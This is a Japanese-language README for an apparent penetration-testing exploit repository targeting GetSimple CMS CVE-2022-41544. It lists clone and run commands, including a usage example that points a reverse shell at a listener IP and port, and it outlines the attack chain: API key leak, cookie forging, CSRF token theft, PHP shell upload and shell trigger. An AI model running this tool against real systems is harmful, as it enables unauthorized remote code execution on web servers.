
Python製のエクスプロイトスクリプトで、GetSimple CMSのCVE-2022-41544に対応。APIキーの漏洩、CSRFトークンの抽出、PHPシェルのアップロード、リバースシェルの起動を自動化し、ペネトレーションテストを支援します。
このリポジトリには、GetSimple CMS の CVE-2022-41544 脆弱性を悪用するスクリプトが含まれています。このスクリプトは、脆弱性の確認、API キーの漏洩、Cookie の設定、CSRF トークンの取得、シェルのアップロード、シェルの起動など、複数のステップを実行します。
telnetlib インポートを削除しました。リポジトリのクローン:
git clone https://github.com/n3rdyn3xus/CVE-2022-41544.git
cd CVE-2022-41544
依存関係のインストール:
Python 3 と requests ライブラリがインストールされていることを確認してください。
pip3 install requests
スクリプトの実行:
python3 CVE-2022-41544.py <target> <path> <ip:port> <username>
<target>: ターゲットのドメインまたは IP アドレス。<path>: GetSimple CMS のインストール先のパス。<ip:port>: リバースシェル用の IP とポート。<username>: GetSimple CMS の管理者ユーザー名。例:
python3 CVE-2022-41544.py 10.129.42.249 /CMS 10.10.14.8:4444 admin


print_the_banner(): ASCII アートを使用して装飾されたバナーを表示します。get_version(target, path): ターゲットの GetSimple CMS のバージョンが脆弱かどうかを確認します。api_leak(target, path): 認証 XML ファイルから API キーの取得を試みます。set_cookies(username, version, apikey): 取得した API キーに基づいて、後続のリクエストに必要な Cookie を設定します。get_csrf_token(target, path, headers): シェルのアップロードに必要な CSRF トークンを抽出します。upload_shell(target, path, headers, nonce, shell_content): PHP シェルをターゲットサーバーにアップロードします。shell_trigger(target, path): アップロードしたシェルを実行して、リバースシェル接続を確立します。main() 関数は、CVE-2022-41544 の脆弱性を悪用するために上記の関数を順番に呼び出し、プロセス全体を統括します。
このスクリプトは h3x0v3rl0rd によって開発されました。
このスクリプトは教育目的のみで提供されています。システムへの不正アクセスは違法かつ非倫理的です。このスクリプトは責任を持って、テストする明示的な許可を得たシステム上でのみ使用してください。
このプロジェクトは MIT ライセンスの下でライセンスされています。詳細は LICENSE ファイルを参照してください。